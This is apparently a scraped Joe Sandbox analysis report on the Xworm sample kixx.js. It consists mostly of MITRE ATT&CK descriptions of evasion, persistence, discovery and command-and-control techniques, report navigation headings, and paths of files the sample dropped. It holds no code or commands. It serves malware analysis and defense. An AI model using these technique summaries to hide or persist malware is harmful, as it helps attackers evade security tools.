Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report kixx.js

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Xworm

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Service.exe.log

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\fzP.exe.log

C:\Users\user\AppData\Local\Temp\Log.tmp

C:\Users\user\AppData\Local\Temp\fzP.exe

C:\Users\user\AppData\Roaming\Service.exe

Static File Info

General

File Icon

Network Behavior

Network Port Distribution

UDP Packets

DNS Queries

DNS Answers

Statistics

CPU Usage

Windows Analysis Report
kixx.js

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre